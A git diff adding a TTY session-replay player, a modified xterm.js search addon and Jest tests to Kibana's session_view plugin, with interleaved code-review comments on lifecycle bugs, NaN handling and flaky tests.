@@ -0,0 +1,230 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ +import { Terminal } from 'xterm'; +import 'xterm/css/xterm.css'; +import { FitAddon } from 'xterm-addon-fit'; +import { useMemo, useState, useEffect, useCallback } from 'react'; +import { useInfiniteQuery } from 'react-query'; +import { CoreStart } from '@kbn/core/public'; +import { useKibana } from '@kbn/kibana-react-plugin/public'; +import { SearchAddon } from './xterm_search'; +import { useEuiTheme } from '../../hooks'; +import { + IOLine, + ProcessEvent, + ProcessEventResults, + ProcessEventsPage, +} from '../../../common/types/process_tree'; +import { + IO_EVENTS_ROUTE, + IO_EVENTS_PER_PAGE, + QUERY_KEY_IO_EVENTS, + DEFAULT_TTY_PLAYSPEED_MS, +} from '../../../common/constants'; + +export const useFetchIOEvents = (sessionEntityId: string) => { + const { http } = useKibana().services; + const cachingKeys = useMemo(() => [QUERY_KEY_IO_EVENTS, sessionEntityId], [sessionEntityId]); + + const query = useInfiniteQuery( + cachingKeys, + async ({ pageParam = {} }) => { + const { cursor } = pageParam; + const res = await http.get(IO_EVENTS_ROUTE, { + query: { + sessionEntityId, + cursor, + }, + }); + + const events = res.events?.map((event: any) => event._source as ProcessEvent) ?? []; + + return { events, cursor, total: res.total }; + }, + { + getNextPageParam: (lastPage) => { + if (lastPage.events.length >= IO_EVENTS_PER_PAGE) { + return { + cursor: lastPage.events[lastPage.events.length - 1]['@timestamp'], + }; + } + }, + refetchOnWindowFocus: false, + refetchOnMount: false, + refetchOnReconnect: false, + } + ); + + return query; +}; + +/** + * flattens all pages of IO events into an array of lines + * note: not efficient currently, tracking a page cursor to avoid redoing work is needed. 
+ */ +export const useIOLines = (pages: ProcessEventsPage[] | undefined) => { + const lines: IOLine[] = useMemo(() => { + const newLines: IOLine[] = []; + + if (!pages) { + return newLines; + } + + return pages.reduce((previous, current) => { + if (current.events) { + current.events.forEach((event) => { + if (event?.process?.io?.text) { + const data: IOLine[] = event.process.io.text.split(/\n\r?/).map((line) => { + return { + value: line, + }; + }); + + previous = previous.concat(data); + } + }); + } + + return previous; + }, newLines); + }, [pages]); + + return lines; +}; + +export interface XtermPlayerDeps { + ref: React.RefObject; + isPlaying: boolean; + lines: IOLine[]; + hasNextPage?: boolean; + fetchNextPage?: () => void; + isFullscreen?: boolean; +} + +export const useXtermPlayer = ({ + ref, + isPlaying, + lines, + hasNextPage, + fetchNextPage, + isFullscreen, +}: XtermPlayerDeps) => { + const { euiTheme } = useEuiTheme(); + const { font, colors } = euiTheme; + const [currentLine, setCurrentLine] = useState(0); + const [userSeeked, setUserSeeked] = useState(false); + const [playSpeed] = useState(DEFAULT_TTY_PLAYSPEED_MS); // potentially configurable + + const [terminal, fitAddon, searchAddon] = useMemo(() => { + const term = new Terminal({ + theme: { + background: 'rgba(0,0,0,0)', + selection: colors.warning, + }, + fontFamily: font.familyCode, + fontSize: 11, + allowTransparency: true, + }); + + const fitInstance = new FitAddon(); + const searchInstance = new SearchAddon(); + + term.loadAddon(fitInstance); + term.loadAddon(searchInstance); + + return [term, fitInstance, searchInstance]; + }, [colors, font]); + + useEffect(() => { + if (ref.current) { + terminal.open(ref.current); + } + }, [terminal, ref]); + + useEffect(() => { + // isFullscreen check is there just to avoid the necessary "unnecessary" react-hook dep + // When isFullscreen changes, e.g goes from false to true and vice versa, we need to call fit. 
+ if (isFullscreen !== undefined) { + fitAddon.fit(); + } + }, [isFullscreen, fitAddon]); + + const render = useCallback( + (lineNumber: number) => { + if (lines.length === 0) { + return; + } + + let linesToPrint; + + if (userSeeked) { + linesToPrint = lines.slice(0, lineNumber); + terminal.clear(); + setUserSeeked(false); + } else { + linesToPrint = [lines[lineNumber]]; + } + + linesToPrint.forEach((line, index) => { + if (line?.value !== undefined) { + terminal.writeln(line.value); + } + }); + }, + [terminal, lines, userSeeked] + ); + + useEffect(() => { + if (isPlaying) { + const timer = setTimeout(() => { + if (!isPlaying) { + return; + } + + if (currentLine < lines.length) { + setCurrentLine(currentLine + 1); + } + }, playSpeed); + + return () => { + clearInterval(timer); + }; + } + }, [lines, currentLine, isPlaying, playSpeed]); + + useEffect(() => { + render(currentLine); + + if (hasNextPage && fetchNextPage && currentLine === lines.length - 1) { + fetchNextPage(); + } + }, [fetchNextPage, currentLine, lines, render, hasNextPage]); + + const seekToLine = useCallback((line) => { + setUserSeeked(true); + setCurrentLine(line); + }, []); + + const search = useCallback( + (query: string, startCol: number) => { + searchAddon.findNext(query, { caseSensitive: false, lastLineOnly: true, startCol }); + }, + [searchAddon] + ); + + const fit = useCallback(() => { + fitAddon.fit(); + }, [fitAddon]); + + return { + terminal, + currentLine, + seekToLine, + search, + fit, + }; +}; diff --git a/x-pack/plugins/session_view/public/components/tty_player/index.test.tsx b/x-pack/plugins/session_view/public/components/tty_player/index.test.tsx new file mode 100644 index 0000000000000..d9fa7baf6e886 --- /dev/null +++ b/x-pack/plugins/session_view/public/components/tty_player/index.test.tsx 
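Review bot: The `Terminal` built in `useMemo` is opened on the container but never disposed — the effect calling `terminal.open(ref.current)` has no cleanup, and when `colors`/`font` change a second instance is created while the first keeps its DOM nodes and listeners; return `() => terminal.dispose();` from that effect so it runs on unmount and before a replacement instance is opened. In the playback effect the inner `if (!isPlaying) return;` is dead because the timeout closure only exists when `isPlaying` was true, and the `setTimeout` handle is released with `clearInterval`; use `clearTimeout(timer)` and drop the dead check. The replayed `process.io.text` is output recorded from the monitored host, so xterm.js interprets every control sequence it contains rather than displaying it literally; since this player never routes keystrokes anywhere, pass `disableStdin: true` in the Terminal options and note in a comment that the text is rendered as-is, so the read-only intent is explicit. Two smaller points: `seekToLine`'s parameter is untyped and should be `(line: number)`, and `render` declares an unused `index` in its `forEach`. `terminal.clear()` keeps the cursor's current line when a seek re-renders; if a duplicated line ever shows at the top after seeking, `terminal.reset()` clears the buffer completely.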
@@ -0,0 +1,81 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +import React from 'react'; +import { waitFor } from '@testing-library/react'; +import { sessionViewIOEventsMock } from '../../../common/mocks/responses/session_view_io_events.mock'; +import { AppContextTestRender, createAppRootMockRenderer } from '../../test'; +import { TTYPlayerDeps, TTYPlayer } from '.'; + +describe('TTYPlayer component', () => { + beforeAll(() => { + // https://stackoverflow.com/questions/39830580/jest-test-fails-typeerror-window-matchmedia-is-not-a-function + // xtermjs is using window.matchMedia, which isn't mocked in jest by default. + Object.defineProperty(window, 'matchMedia', { + writable: true, + value: jest.fn().mockImplementation((query) => ({ + matches: false, + media: query, + onchange: null, + addListener: jest.fn(), // Deprecated + removeListener: jest.fn(), // Deprecated + addEventListener: jest.fn(), + removeEventListener: jest.fn(), + dispatchEvent: jest.fn(), + })), + }); + }); + + let render: () => ReturnType; + let renderResult: ReturnType; + let mockedContext: AppContextTestRender; + let mockedApi: AppContextTestRender['coreStart']['http']['get']; + let props: TTYPlayerDeps; + + const waitForApiCall = () => waitFor(() => expect(mockedApi).toHaveBeenCalled()); + + beforeEach(() => { + mockedContext = createAppRootMockRenderer(); + mockedApi = mockedContext.coreStart.http.get; + mockedApi.mockResolvedValue(sessionViewIOEventsMock); + + const mockSessionEntityId = + sessionViewIOEventsMock?.events?.[0]?._source?.process?.entry_leader?.entity_id; + + props = { + sessionEntityId: mockSessionEntityId, + onClose: jest.fn(), + isFullscreen: false, + }; + }); + + describe('When TTYPlayer is mounted', () => { + it('should have a search bar', () => { + 
renderResult = mockedContext.render(); + expect(renderResult.queryByTestId('sessionView:TTYSearch')).toBeTruthy(); + }); + it('should render container for xtermjs', () => { + renderResult = mockedContext.render(); + expect(renderResult.queryByTestId('sessionView:TTYPlayer')).toBeTruthy(); + }); + it('should have player controls', () => { + renderResult = mockedContext.render(); + expect(renderResult.queryByTestId('sessionView:TTYPlayerControls')).toBeTruthy(); + }); + it('should have rendered an instance of xtermjs', () => { + renderResult = mockedContext.render(); + expect( + renderResult.queryByTestId('sessionView:TTYPlayer')?.querySelector('.terminal.xterm') + ).toBeTruthy(); + }); + it('should have fetched io events', async () => { + renderResult = mockedContext.render(); + + await waitForApiCall(); + }); + }); +}); diff --git a/x-pack/plugins/session_view/public/components/tty_player/index.tsx b/x-pack/plugins/session_view/public/components/tty_player/index.tsx new file mode 100644 index 0000000000000..48dbf82441e42 --- /dev/null +++ b/x-pack/plugins/session_view/public/components/tty_player/index.tsx 
@@ -0,0 +1,100 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ +import React, { useRef, useState, useCallback, ChangeEvent, MouseEvent } from 'react'; +import { EuiPanel, EuiRange, EuiFlexGroup, EuiFlexItem, EuiButtonIcon } from '@elastic/eui'; +import { TTYSearchBar } from '../tty_search_bar'; +import { useStyles } from './styles'; +import { useFetchIOEvents, useIOLines, useXtermPlayer } from './hooks'; + +export interface TTYPlayerDeps { + sessionEntityId: string; // TODO: we should not load by session id, but instead a combo of process.tty.major+minor, session time range, and host.boot_id (see Rabbitholes section of epic). + onClose(): void; + isFullscreen: boolean; +} + +export const TTYPlayer = ({ sessionEntityId, onClose, isFullscreen }: TTYPlayerDeps) => { + const styles = useStyles(); + const ref = useRef(null); + + const { data, fetchNextPage, hasNextPage } = useFetchIOEvents(sessionEntityId); + const lines = useIOLines(data?.pages); + const [isPlaying, setIsPlaying] = useState(false); + const { search, currentLine, seekToLine } = useXtermPlayer({ + ref, + isPlaying, + lines, + hasNextPage, + fetchNextPage, + isFullscreen, + }); + + const onLineChange = useCallback( + (event: ChangeEvent | MouseEvent) => { + const line = parseInt((event?.target as HTMLInputElement).value || '0', 10); + seekToLine(line); + setIsPlaying(false); + }, + [seekToLine] + ); + + const onTogglePlayback = useCallback(() => { + setIsPlaying(!isPlaying); + }, [isPlaying]); + + return ( +
+ + + + + + + + + + + +
+ + {/* the following will be replaced by a new component */} + + + + + + + + + + +
+ ); +}; diff --git a/x-pack/plugins/session_view/public/components/tty_player/styles.ts b/x-pack/plugins/session_view/public/components/tty_player/styles.ts new file mode 100644 index 0000000000000..c4061c8a64dce --- /dev/null +++ b/x-pack/plugins/session_view/public/components/tty_player/styles.ts @@ -0,0 +1,55 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +import { useMemo } from 'react'; +import { CSSObject, css } from '@emotion/react'; +import { transparentize, useEuiScrollBar } from '@elastic/eui'; +import { useEuiTheme } from '../../hooks'; + +export const useStyles = () => { + const { euiTheme } = useEuiTheme(); + const euiScrollBar = useEuiScrollBar(); + + const cached = useMemo(() => { + const { size, colors, border } = euiTheme; + + const container: CSSObject = { + position: 'absolute', + top: 0, + width: '100%', + height: '100%', + overflow: 'hidden', + borderRadius: size.s, + backgroundColor: colors.ink, + '.euiRangeLevel--warning': { + backgroundColor: transparentize(colors.warning, 0.8), + }, + '.euiRangeLevel--danger': { + backgroundColor: transparentize(colors.danger, 0.8), + }, + '.euiRangeTick,.euiRangeLevel': { + transition: 'left 500ms', + }, + }; + + const terminal: CSSObject = { + width: '100%', + height: 'calc(100% - 142px)', + '.xterm-viewport': css` + ${euiScrollBar} + `, + border: border.thin, + }; + + return { + container, + terminal, + }; + }, [euiScrollBar, euiTheme]); + + return cached; +}; diff --git a/x-pack/plugins/session_view/public/components/tty_player/xterm_search.ts b/x-pack/plugins/session_view/public/components/tty_player/xterm_search.ts new file mode 100644 index 0000000000000..258920319676c --- /dev/null +++ b/x-pack/plugins/session_view/public/components/tty_player/xterm_search.ts 
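Review bot: `onLineChange` feeds whatever `parseInt` returns straight into `seekToLine`, and a non-numeric `value` (the `MouseEvent` branch casts `event.target` to `HTMLInputElement` without checking it) yields `NaN`, which then drives `setCurrentLine`, `lines.slice(0, NaN)` and `currentLine + 1` in the player hook. EuiRange should normally supply a numeric string, but the guard is one line: `const line = parseInt(...); if (Number.isNaN(line)) return;` before the `seekToLine(line)` call. The JSX of the component was lost in this rendering of the diff, so the markup itself could not be reviewed.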
@@ -0,0 +1,487 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +/** + * Copyright (c) 2017 The xterm.js authors. All rights reserved. + * @license MIT + */ +import { Terminal, IDisposable, ITerminalAddon, ISelectionPosition } from 'xterm'; + +export interface ISearchOptions { + regex?: boolean; + wholeWord?: boolean; + caseSensitive?: boolean; + incremental?: boolean; + lastLineOnly?: boolean; + startCol?: number; +} + +export interface ISearchPosition { + startCol: number; + startRow: number; +} + +export interface ISearchResult { + term: string; + col: number; + row: number; + size: number; +} + +type LineCacheEntry = [ + /** + * The string representation of a line (as opposed to the buffer cell representation). + */ + lineAsString: string, + /** + * The offsets where each line starts when the entry describes a wrapped line. + */ + lineOffsets: number[] +]; + +const LINES_CACHE_TIME_TO_LIVE = 15 * 1000; // 15 secs + +export class SearchAddon implements ITerminalAddon { + private _terminal: Terminal | undefined; + + /** + * translateBufferLineToStringWithWrap is a fairly expensive call. + * We memoize the calls into an array that has a time based ttl. + * _linesCache is also invalidated when the terminal cursor moves. + */ + private _linesCache: LineCacheEntry[] | undefined; + private _linesCacheTimeoutId = 0; + private _cursorMoveListener: IDisposable | undefined; + private _resizeListener: IDisposable | undefined; + + public activate(terminal: Terminal): void { + this._terminal = terminal; + } + + public dispose(): void {} + + /** + * Find the next instance of the term, then scroll to and select it. If it + * doesn't exist, do nothing. + * @param term The search term. + * @param searchOptions Search options. + * @return Whether a result was found. 
+ */ + public findNext(term: string, searchOptions?: ISearchOptions): boolean { + if (!this._terminal) { + throw new Error('Cannot use addon until it has been loaded'); + } + + if (!term || term.length === 0) { + this._terminal.clearSelection(); + return false; + } + + let startCol = 0; + let startRow = 0; + let currentSelection: ISelectionPosition | undefined; + if (this._terminal.hasSelection()) { + const incremental = searchOptions ? searchOptions.incremental : false; + // Start from the selection end if there is a selection + // For incremental search, use existing row + currentSelection = this._terminal.getSelectionPosition()!; + startRow = incremental ? currentSelection.startRow : currentSelection.endRow; + startCol = incremental ? currentSelection.startColumn : currentSelection.endColumn; + } + + if (searchOptions?.lastLineOnly) { + startRow = this._terminal.buffer.active.cursorY - 1; + startCol = searchOptions?.startCol || 0; + } + + this._initLinesCache(); + + const searchPosition: ISearchPosition = { + startRow, + startCol, + }; + + // Search startRow + let result = this._findInLine(term, searchPosition, searchOptions); + + // Search from startRow + 1 to end + if (!result) { + for ( + let y = startRow + 1; + y < this._terminal.buffer.active.baseY + this._terminal.rows; + y++ + ) { + searchPosition.startRow = y; + searchPosition.startCol = 0; + // If the current line is wrapped line, increase index of column to ignore the previous scan + // Otherwise, reset beginning column index to zero with set new unwrapped line index + result = this._findInLine(term, searchPosition, searchOptions); + if (result) { + break; + } + } + } + // If we hit the bottom and didn't search from the very top wrap back up + if (!result && startRow !== 0) { + for (let y = 0; y < startRow; y++) { + searchPosition.startRow = y; + searchPosition.startCol = 0; + result = this._findInLine(term, searchPosition, searchOptions); + if (result) { + break; + } + } + } + + // If there is only 
one result, wrap back and return selection if it exists. + if (!result && currentSelection) { + searchPosition.startRow = currentSelection.startRow; + searchPosition.startCol = 0; + result = this._findInLine(term, searchPosition, searchOptions); + } + + // Set selection and scroll if a result was found + return this._selectResult(result); + } + + /** + * Find the previous instance of the term, then scroll to and select it. If it + * doesn't exist, do nothing. + * @param term The search term. + * @param searchOptions Search options. + * @return Whether a result was found. + */ + public findPrevious(term: string, searchOptions?: ISearchOptions): boolean { + if (!this._terminal) { + throw new Error('Cannot use addon until it has been loaded'); + } + + if (!term || term.length === 0) { + this._terminal.clearSelection(); + return false; + } + + const isReverseSearch = true; + let startRow = this._terminal.buffer.active.baseY + this._terminal.rows; + let startCol = this._terminal.cols; + let result: ISearchResult | undefined; + const incremental = searchOptions ? searchOptions.incremental : false; + let currentSelection: ISelectionPosition | undefined; + if (this._terminal.hasSelection()) { + currentSelection = this._terminal.getSelectionPosition()!; + // Start from selection start if there is a selection + startRow = currentSelection.startRow; + startCol = currentSelection.startColumn; + } + + if (searchOptions?.lastLineOnly) { + startRow = this._terminal.buffer.active.cursorY - 1; + } + + this._initLinesCache(); + const searchPosition: ISearchPosition = { + startRow, + startCol, + }; + + if (incremental) { + // Try to expand selection to right first. 
+ result = this._findInLine(term, searchPosition, searchOptions, false); + const isOldResultHighlighted = result && result.row === startRow && result.col === startCol; + if (!isOldResultHighlighted) { + // If selection was not able to be expanded to the right, then try reverse search + if (currentSelection) { + searchPosition.startRow = currentSelection.endRow; + searchPosition.startCol = currentSelection.endColumn; + } + result = this._findInLine(term, searchPosition, searchOptions, true); + } + } else { + result = this._findInLine(term, searchPosition, searchOptions, isReverseSearch); + } + + // Search from startRow - 1 to top + if (!result) { + searchPosition.startCol = Math.max(searchPosition.startCol, this._terminal.cols); + for (let y = startRow - 1; y >= 0; y--) { + searchPosition.startRow = y; + result = this._findInLine(term, searchPosition, searchOptions, isReverseSearch); + if (result) { + break; + } + } + } + // If we hit the top and didn't search from the very bottom wrap back down + if (!result && startRow !== this._terminal.buffer.active.baseY + this._terminal.rows) { + for (let y = this._terminal.buffer.active.baseY + this._terminal.rows; y >= startRow; y--) { + searchPosition.startRow = y; + result = this._findInLine(term, searchPosition, searchOptions, isReverseSearch); + if (result) { + break; + } + } + } + + // If there is only one result, return true. 
+ if (!result && currentSelection) return true; + + // Set selection and scroll if a result was found + return this._selectResult(result); + } + + /** + * Sets up a line cache with a ttl + */ + private _initLinesCache(): void { + const terminal = this._terminal!; + if (!this._linesCache) { + this._linesCache = new Array(terminal.buffer.active.length); + this._cursorMoveListener = terminal.onCursorMove(() => this._destroyLinesCache()); + this._resizeListener = terminal.onResize(() => this._destroyLinesCache()); + } + + window.clearTimeout(this._linesCacheTimeoutId); + this._linesCacheTimeoutId = window.setTimeout( + () => this._destroyLinesCache(), + LINES_CACHE_TIME_TO_LIVE + ); + } + + private _destroyLinesCache(): void { + this._linesCache = undefined; + if (this._cursorMoveListener) { + this._cursorMoveListener.dispose(); + this._cursorMoveListener = undefined; + } + if (this._resizeListener) { + this._resizeListener.dispose(); + this._resizeListener = undefined; + } + if (this._linesCacheTimeoutId) { + window.clearTimeout(this._linesCacheTimeoutId); + this._linesCacheTimeoutId = 0; + } + } + + /** + * Searches a line for a search term. Takes the provided terminal line and searches the text line, which may contain + * subsequent terminal lines if the text is wrapped. If the provided line number is part of a wrapped text line that + * started on an earlier line then it is skipped since it will be properly searched when the terminal line that the + * text starts on is searched. + * @param term The search term. + * @param searchPosition The position to start the search. + * @param searchOptions Search options. + * @param isReverseSearch Whether the search should start from the right side of the terminal and search to the left. + * @return The search result if it was found. 
+ */ + protected _findInLine( + term: string, + searchPosition: ISearchPosition, + searchOptions: ISearchOptions = {}, + isReverseSearch: boolean = false + ): ISearchResult | undefined { + const terminal = this._terminal!; + const row = searchPosition.startRow; + const col = searchPosition.startCol; + + // Ignore wrapped lines, only consider on unwrapped line (first row of command string). + const firstLine = terminal.buffer.active.getLine(row); + if (firstLine?.isWrapped) { + if (isReverseSearch) { + searchPosition.startCol += terminal.cols; + return; + } + + // This will iterate until we find the line start. + // When we find it, we will search using the calculated start column. + searchPosition.startRow--; + searchPosition.startCol += terminal.cols; + return this._findInLine(term, searchPosition, searchOptions); + } + let cache = this._linesCache?.[row]; + if (!cache) { + cache = this._translateBufferLineToStringWithWrap(row, true); + if (this._linesCache) { + this._linesCache[row] = cache; + } + } + const [stringLine, offsets] = cache; + + const offset = this._bufferColsToStringOffset(row, col); + const searchTerm = searchOptions.caseSensitive ? term : term.toLowerCase(); + const searchStringLine = searchOptions.caseSensitive ? 
stringLine : stringLine.toLowerCase(); + + let resultIndex = -1; + if (searchOptions.regex) { + const searchRegex = RegExp(searchTerm, 'g'); + let foundTerm: RegExpExecArray | null; + if (isReverseSearch) { + // This loop will get the resultIndex of the _last_ regex match in the range 0..offset + while ((foundTerm = searchRegex.exec(searchStringLine.slice(0, offset)))) { + resultIndex = searchRegex.lastIndex - foundTerm[0].length; + term = foundTerm[0]; + searchRegex.lastIndex -= term.length - 1; + } + } else { + foundTerm = searchRegex.exec(searchStringLine.slice(offset)); + if (foundTerm && foundTerm[0].length > 0) { + resultIndex = offset + (searchRegex.lastIndex - foundTerm[0].length); + term = foundTerm[0]; + } + } + } else { + if (isReverseSearch) { + if (offset - searchTerm.length >= 0) { + resultIndex = searchStringLine.lastIndexOf(searchTerm, offset - searchTerm.length); + } + } else { + resultIndex = searchStringLine.indexOf(searchTerm, offset); + } + } + + if (resultIndex >= 0) { + // Adjust the row number and search index if needed since a "line" of text can span multiple rows + let startRowOffset = 0; + while (startRowOffset < offsets.length - 1 && resultIndex >= offsets[startRowOffset + 1]) { + startRowOffset++; + } + let endRowOffset = startRowOffset; + while ( + endRowOffset < offsets.length - 1 && + resultIndex + term.length >= offsets[endRowOffset + 1] + ) { + endRowOffset++; + } + const startColOffset = resultIndex - offsets[startRowOffset]; + const endColOffset = resultIndex + term.length - offsets[endRowOffset]; + const startColIndex = this._stringLengthToBufferSize(row + startRowOffset, startColOffset); + const endColIndex = this._stringLengthToBufferSize(row + endRowOffset, endColOffset); + const size = endColIndex - startColIndex + terminal.cols * (endRowOffset - startRowOffset); + + return { + term, + col: startColIndex, + row: row + startRowOffset, + size, + }; + } + } + + private _stringLengthToBufferSize(row: number, offset: number): 
number { + const line = this._terminal!.buffer.active.getLine(row); + if (!line) { + return 0; + } + for (let i = 0; i < offset; i++) { + const cell = line.getCell(i); + if (!cell) { + break; + } + // Adjust the searchIndex to normalize emoji into single chars + const char = cell.getChars(); + if (char.length > 1) { + offset -= char.length - 1; + } + // Adjust the searchIndex for empty characters following wide unicode + // chars (eg. CJK) + const nextCell = line.getCell(i + 1); + if (nextCell && nextCell.getWidth() === 0) { + offset++; + } + } + return offset; + } + + private _bufferColsToStringOffset(startRow: number, cols: number): number { + const terminal = this._terminal!; + let lineIndex = startRow; + let offset = 0; + let line = terminal.buffer.active.getLine(lineIndex); + while (cols > 0 && line) { + for (let i = 0; i < cols && i < terminal.cols; i++) { + const cell = line.getCell(i); + if (!cell) { + break; + } + if (cell.getWidth()) { + offset += cell.getChars().length; + } + } + lineIndex++; + line = terminal.buffer.active.getLine(lineIndex); + if (line && !line.isWrapped) { + break; + } + cols -= terminal.cols; + } + return offset; + } + + /** + * Translates a buffer line to a string, including subsequent lines if they are wraps. + * Wide characters will count as two columns in the resulting string. This + * function is useful for getting the actual text underneath the raw selection + * position. + * @param lineIndex The line being translated. + * @param trimRight Whether to trim whitespace to the right. + */ + private _translateBufferLineToStringWithWrap( + lineIndex: number, + trimRight: boolean + ): LineCacheEntry { + const terminal = this._terminal!; + const strings = []; + const lineOffsets = [0]; + let line = terminal.buffer.active.getLine(lineIndex); + while (line) { + const nextLine = terminal.buffer.active.getLine(lineIndex + 1); + const lineWrapsToNext = nextLine ? 
nextLine.isWrapped : false; + let string = line.translateToString(!lineWrapsToNext && trimRight); + if (lineWrapsToNext && nextLine) { + const lastCell = line.getCell(line.length - 1); + const lastCellIsNull = lastCell && lastCell.getCode() === 0 && lastCell.getWidth() === 1; + // a wide character wrapped to the next line + if (lastCellIsNull && nextLine.getCell(0)?.getWidth() === 2) { + string = string.slice(0, -1); + } + } + strings.push(string); + if (lineWrapsToNext) { + lineOffsets.push(lineOffsets[lineOffsets.length - 1] + string.length); + } else { + break; + } + lineIndex++; + line = nextLine; + } + return [strings.join(''), lineOffsets]; + } + + /** + * Selects and scrolls to a result. + * @param result The result to select. + * @return Whethera result was selected. + */ + private _selectResult(result: ISearchResult | undefined): boolean { + const terminal = this._terminal!; + if (!result) { + terminal.clearSelection(); + return false; + } + terminal.select(result.col, result.row, result.size); + // If it is not in the viewport then we scroll else it just gets selected + if ( + result.row >= terminal.buffer.active.viewportY + terminal.rows || + result.row < terminal.buffer.active.viewportY + ) { + let scroll = result.row - terminal.buffer.active.viewportY; + scroll -= Math.floor(terminal.rows / 2); + terminal.scrollLines(scroll); + } + return true; + } +} diff --git a/x-pack/plugins/session_view/public/components/tty_search_bar/index.test.tsx b/x-pack/plugins/session_view/public/components/tty_search_bar/index.test.tsx new file mode 100644 index 0000000000000..4545acf1a4578 --- /dev/null +++ b/x-pack/plugins/session_view/public/components/tty_search_bar/index.test.tsx 
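Review bot: The `lastLineOnly` branch in `findNext`/`findPrevious` sets `startRow = this._terminal.buffer.active.cursorY - 1`, but if I read the xterm buffer API right `cursorY` is relative to the viewport while `_findInLine` indexes `buffer.active.getLine(row)` with absolute buffer rows (the other start positions in this file add `baseY`); once the replayed output exceeds the visible rows and `baseY > 0`, the "last line" search would inspect the wrong buffer line, and with the cursor on row 0 it becomes `-1`. `startRow = this._terminal.buffer.active.baseY + this._terminal.buffer.active.cursorY - 1;` would keep both paths in the same coordinate system. Separately, `dispose()` is empty although `_initLinesCache` registers `onCursorMove`/`onResize` listeners and a `window.setTimeout`; `public dispose(): void { this._destroyLinesCache(); }` releases them when the terminal is torn down. Since this is a locally modified copy of the xterm.js search addon, the header should also record the upstream version or commit it was forked from and list the local additions (`lastLineOnly`, `startCol`) so upstream fixes can be ported.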
@@ -0,0 +1,102 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ +import React from 'react'; +import { renderHook } from '@testing-library/react-hooks'; +import userEvent from '@testing-library/user-event'; +import { fireEvent } from '@testing-library/dom'; +import { AppContextTestRender, createAppRootMockRenderer } from '../../test'; +import { sessionViewIOEventsMock } from '../../../common/mocks/responses/session_view_io_events.mock'; +import { useIOLines } from '../tty_player/hooks'; +import { ProcessEventsPage } from '../../../common/types/process_tree'; +import { TTYSearchBar, TTYSearchBarDeps } from '.'; + +// TTYSearchBar is a HOC to SessionViewSearchBar which is already well tested +// so these tests will only focus on newly added functionality +describe('TTYSearchBar component', () => { + let render: () => ReturnType; + let renderResult: ReturnType; + let mockedContext: AppContextTestRender; + let props: TTYSearchBarDeps; + + beforeEach(() => { + mockedContext = createAppRootMockRenderer(); + + const events = sessionViewIOEventsMock?.events?.map((event) => event._source); + const pages: ProcessEventsPage[] = [{ events, total: events?.length }]; + const { result } = renderHook(() => useIOLines(pages)); + const lines = result.current; + + props = { + lines, + seekToLine: jest.fn(), + xTermSearchFn: jest.fn(), + }; + }); + + it('mounts and renders the search bar', async () => { + renderResult = mockedContext.render(); + expect(renderResult.queryByTestId('sessionView:searchBar')).toBeTruthy(); + }); + + it('does a search when a user enters text and hits enter', async () => { + renderResult = mockedContext.render(); + + const searchInput = renderResult.queryByTestId('sessionView:searchBar')?.querySelector('input'); + if (searchInput) { + 
userEvent.type(searchInput, '-h'); + fireEvent.keyUp(searchInput, { key: 'Enter', code: 'Enter' }); + } + + expect(props.seekToLine).toHaveBeenCalledTimes(1); + + // there is a slight delay in the seek in xtermjs, so we wait 100ms before trying to highlight a result. + await new Promise((r) => setTimeout(r, 100)); + + expect(props.xTermSearchFn).toHaveBeenCalledTimes(1); + }); + + it('calls seekToline and xTermSearchFn when currentMatch changes', async () => { + renderResult = mockedContext.render(); + + const searchInput = renderResult.queryByTestId('sessionView:searchBar')?.querySelector('input'); + if (searchInput) { + userEvent.type(searchInput, '-h'); + fireEvent.keyUp(searchInput, { key: 'Enter', code: 'Enter' }); + } + + await new Promise((r) => setTimeout(r, 100)); + + userEvent.click(renderResult.getByTestId('pagination-button-next')); + + await new Promise((r) => setTimeout(r, 100)); + + // two calls, first instance -h is at line 22, 2nd at line 42 + expect(props.seekToLine).toHaveBeenCalledTimes(2); + expect(props.seekToLine).toHaveBeenNthCalledWith(1, 22); + expect(props.seekToLine).toHaveBeenNthCalledWith(2, 42); + + expect(props.xTermSearchFn).toHaveBeenCalledTimes(2); + expect(props.xTermSearchFn).toHaveBeenNthCalledWith(1, '-h', 6); + expect(props.xTermSearchFn).toHaveBeenNthCalledWith(2, '-h', 13); + }); + + it('calls xTermSearchFn with empty query when search is cleared', async () => { + renderResult = mockedContext.render(); + + const searchInput = renderResult.queryByTestId('sessionView:searchBar')?.querySelector('input'); + if (searchInput) { + userEvent.type(searchInput, '-h'); + fireEvent.keyUp(searchInput, { key: 'Enter', code: 'Enter' }); + } + + await new Promise((r) => setTimeout(r, 100)); + userEvent.click(renderResult.getByTestId('clearSearchButton')); + await new Promise((r) => setTimeout(r, 100)); + + expect(props.xTermSearchFn).toHaveBeenNthCalledWith(2, '', 0); + }); +}); 
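Review bot: The fixed `setTimeout(r, 100)` waits race the 100 ms debounce in the component under test and will be flaky on a slow CI agent; `await waitFor(() => expect(props.xTermSearchFn).toHaveBeenCalledTimes(1))` expresses the intent without depending on timer ordering. The `if (searchInput) { ... }` guard also lets the test pass vacuously when the input is not rendered — assert its presence first, e.g. `expect(searchInput).toBeTruthy();` before typing into it.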
diff --git a/x-pack/plugins/session_view/public/components/tty_search_bar/index.tsx b/x-pack/plugins/session_view/public/components/tty_search_bar/index.tsx new file mode 100644 index 0000000000000..af60bdf664f9d --- /dev/null +++ b/x-pack/plugins/session_view/public/components/tty_search_bar/index.tsx 
